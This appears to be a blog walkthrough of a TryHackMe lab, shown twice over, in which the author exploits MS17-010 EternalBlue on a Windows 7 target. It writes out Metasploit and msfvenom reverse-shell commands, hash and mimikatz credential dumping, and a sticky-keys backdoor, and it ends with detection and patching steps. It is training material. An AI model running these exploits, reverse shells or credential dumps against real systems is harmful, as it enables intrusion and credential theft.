Aug 12, 2020

7 min read

THM Blue Walkthrough — EternalBlue and Windows Exploitation

A complete walkthrough of TryHackMe's "Blue" room — exploiting MS17-010 EternalBlue on a Windows 7 machine for initial access and using the sticky keys backdoor for persistence.

#thm#tryhackme#pentesting#windows#eternalblue

Introduction

Blue is TryHackMe's entry-level Windows exploitation room based on the EternalBlue vulnerability (MS17-010). EternalBlue was the NSA exploit that leaked in 2017 and caused the WannaCry ransomware pandemic that infected 300,000+ systems across 150 countries in a matter of days.

The machine is a Windows 7 SP1 system with SMBv1 enabled and missing the MS17-010 patch. Exploitation gives you a SYSTEM-level shell — the highest privilege on Windows — directly from the initial exploit. No privilege escalation needed. The challenge is in the post-exploitation: capturing flags and setting up persistence.

"EternalBlue is why you update Windows. It's also why you disable SMBv1. One port, one protocol, and the entire world was on fire for a week in May 2017."

Machine Info

Platform: TryHackMe
Room: Blue
OS: Windows 7 SP1
Difficulty: Easy
Released: 2019
Target IP: 10.10.246.28 (varies)

Step 1: Enumeration

bash

nmap -sC -sV -oN blue.nmap 10.10.246.28

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc        Microsoft Windows RPC

SMB on 445 is the key here. Let's check if it's vulnerable to MS17-010:

Checking for EternalBlue**

bash

msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 10.10.246.28
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.246.28:445 - Connecting to target for exploitation.
[*] 10.10.246.28:445 - Connection established for exploitation.
[*] 10.10.246.28:445 - Sending all MS17-010 exploit packets.
[*] 10.10.246.28:445 - Sending final shellcode
[+] 10.10.246.28:445 - Got good! Shellcode worked.
[*] Sending stage (201283 bytes) to 10.10.246.28
[*] Meterpreter session 1 opened

Check privileges:

bash

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

That's SYSTEM — the highest privilege on Windows. No privilege escalation needed.

Step 3: Manual Exploitation (Without Metasploit)

If you don't have Metasploit, the AutoBlue-MS17-010 repository provides a Python implementation:

bash

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=443 -f exe -o shell.exe

# Host the shellcode on a SMB share or HTTP server
python3 -m http.server 8080

# Run the exploit
python eternalblue_exploit7.py 10.10.246.28 shell.exe

This uploads and executes the shellcode, giving you a reverse shell.

Step 4: Post-Exploitation

Finding the Flags

On Windows, flags are usually on the Desktop:

bash

meterpreter > shell

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> dir C:\Users\*\Desktop
 Volume in drive C has no label.

Directory of C:\Users\Administrator\Desktop
flag1.txt

Directory of C:\Users\Jon\Desktop
flag2.txt

Directory of C:\Users\flaguser\Desktop
flag3.txt

Flag 1 — Administrator

bash

type C:\Users\Administrator\Desktop\flag1.txt
{flag1:ACCESS_HAS_BEEN_GRANTED}

Flag 2 — Jon

bash

type C:\Users\Jon\Desktop\flag2.txt
{flag2:ACCESS_HAS_BEEN_DENIED}

Flag 3 — flaguser

bash

type C:\Users\flaguser\Desktop\flag3.txt
{flag3:ACCESS_HAS_BEEN_REVOKED}

Credential Dumping

Since we're SYSTEM, we can dump hashes:

bash

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:...:...
flaguser:1001:...:...

Or use mimikatz:

bash

meterpreter > load mimikatz
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"

Sticky Keys Backdoor

A classic Windows persistence technique — replace sethc.exe (sticky keys) with cmd.exe. When you press Shift five times at the login screen, you get a SYSTEM command prompt:

bash

meterpreter > shell

C:\Windows\system32> takeown /f C:\Windows\System32\sethc.exe
C:\Windows\system32> icacls C:\Windows\System32\sethc.exe /grant Administrators:F
C:\Windows\system32> copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Now RDP into the box (if port 3389 is open) and press Shift five times at the login screen. You get a SYSTEM cmd.exe.

Step 5: Detection and Prevention

Checking if You're Vulnerable**

powershell

# Check if MS17-010 is installed
Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
# Check SMBv1 status
Get-SmbServerConfiguration | Select EnableSMB1Protocol

Patching

bash

# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# Install the security update
wusa.exe KB4012212.msu /quiet /norestart

Lessons Learned

Blue teaches you that Windows exploitation is fundamentally different from Linux:

The initial exploit gives you SYSTEM — once you're past SMB on a vulnerable Windows box, you're at the highest privilege level. No privesc needed.
Post-exploitation on Windows is its own skill — navigating the registry, dumping hashes, bypassing UAC, setting up persistence — these are all different from Linux.
EternalBlue is still around — despite being patched in 2017 and being one of the most famous vulnerabilities ever, MS17-010 still appears on internal networks during engagements.

"Blue is the box that teaches you Windows post-exploitation. The exploit part is automated — what you do after is where the real learning happens."

Aug 12, 2020

Comments

7 min read

THM Blue Walkthrough — EternalBlue and Windows Exploitation

A complete walkthrough of TryHackMe's "Blue" room — exploiting MS17-010 EternalBlue on a Windows 7 machine for initial access and using the sticky keys backdoor for persistence.

#thm#tryhackme#pentesting#windows#eternalblue

Introduction

"EternalBlue is why you update Windows. It's also why you disable SMBv1. One port, one protocol, and the entire world was on fire for a week in May 2017."

Machine Info

Platform: TryHackMe
Room: Blue
OS: Windows 7 SP1
Difficulty: Easy
Released: 2019
Target IP: 10.10.246.28 (varies)

Step 1: Enumeration

bash

nmap -sC -sV -oN blue.nmap 10.10.246.28

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc        Microsoft Windows RPC

SMB on 445 is the key here. Let's check if it's vulnerable to MS17-010:

Checking for EternalBlue**

bash

msfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 10.10.246.28
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > exploit

[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.246.28:445 - Connecting to target for exploitation.
[*] 10.10.246.28:445 - Connection established for exploitation.
[*] 10.10.246.28:445 - Sending all MS17-010 exploit packets.
[*] 10.10.246.28:445 - Sending final shellcode
[+] 10.10.246.28:445 - Got good! Shellcode worked.
[*] Sending stage (201283 bytes) to 10.10.246.28
[*] Meterpreter session 1 opened

Check privileges:

bash

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

That's SYSTEM — the highest privilege on Windows. No privilege escalation needed.

Step 3: Manual Exploitation (Without Metasploit)

If you don't have Metasploit, the AutoBlue-MS17-010 repository provides a Python implementation:

bash

git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010

# Generate shellcode
msfvenom -p windows/shell_reverse_tcp \
  LHOST=10.10.14.2 LPORT=443 -f exe -o shell.exe

# Host the shellcode on a SMB share or HTTP server
python3 -m http.server 8080

# Run the exploit
python eternalblue_exploit7.py 10.10.246.28 shell.exe

This uploads and executes the shellcode, giving you a reverse shell.

Step 4: Post-Exploitation

Finding the Flags

On Windows, flags are usually on the Desktop:

bash

meterpreter > shell

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> dir C:\Users\*\Desktop
 Volume in drive C has no label.

Directory of C:\Users\Administrator\Desktop
flag1.txt

Directory of C:\Users\Jon\Desktop
flag2.txt

Directory of C:\Users\flaguser\Desktop
flag3.txt

Flag 1 — Administrator

bash

type C:\Users\Administrator\Desktop\flag1.txt
{flag1:ACCESS_HAS_BEEN_GRANTED}

Flag 2 — Jon

bash

type C:\Users\Jon\Desktop\flag2.txt
{flag2:ACCESS_HAS_BEEN_DENIED}

Flag 3 — flaguser

bash

type C:\Users\flaguser\Desktop\flag3.txt
{flag3:ACCESS_HAS_BEEN_REVOKED}

Credential Dumping

Since we're SYSTEM, we can dump hashes:

bash

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:...:...
flaguser:1001:...:...

Or use mimikatz:

bash

meterpreter > load mimikatz
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"

Sticky Keys Backdoor

A classic Windows persistence technique — replace sethc.exe (sticky keys) with cmd.exe. When you press Shift five times at the login screen, you get a SYSTEM command prompt:

bash

meterpreter > shell

C:\Windows\system32> takeown /f C:\Windows\System32\sethc.exe
C:\Windows\system32> icacls C:\Windows\System32\sethc.exe /grant Administrators:F
C:\Windows\system32> copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Now RDP into the box (if port 3389 is open) and press Shift five times at the login screen. You get a SYSTEM cmd.exe.

Step 5: Detection and Prevention

Checking if You're Vulnerable**

powershell

# Check if MS17-010 is installed
Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
# Check SMBv1 status
Get-SmbServerConfiguration | Select EnableSMB1Protocol

Patching

bash

# Disable SMBv1
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

# Install the security update
wusa.exe KB4012212.msu /quiet /norestart

Lessons Learned

Blue teaches you that Windows exploitation is fundamentally different from Linux:

The initial exploit gives you SYSTEM — once you're past SMB on a vulnerable Windows box, you're at the highest privilege level. No privesc needed.
Post-exploitation on Windows is its own skill — navigating the registry, dumping hashes, bypassing UAC, setting up persistence — these are all different from Linux.
EternalBlue is still around — despite being patched in 2017 and being one of the most famous vulnerabilities ever, MS17-010 still appears on internal networks during engagements.

"Blue is the box that teaches you Windows post-exploitation. The exploit part is automated — what you do after is where the real learning happens."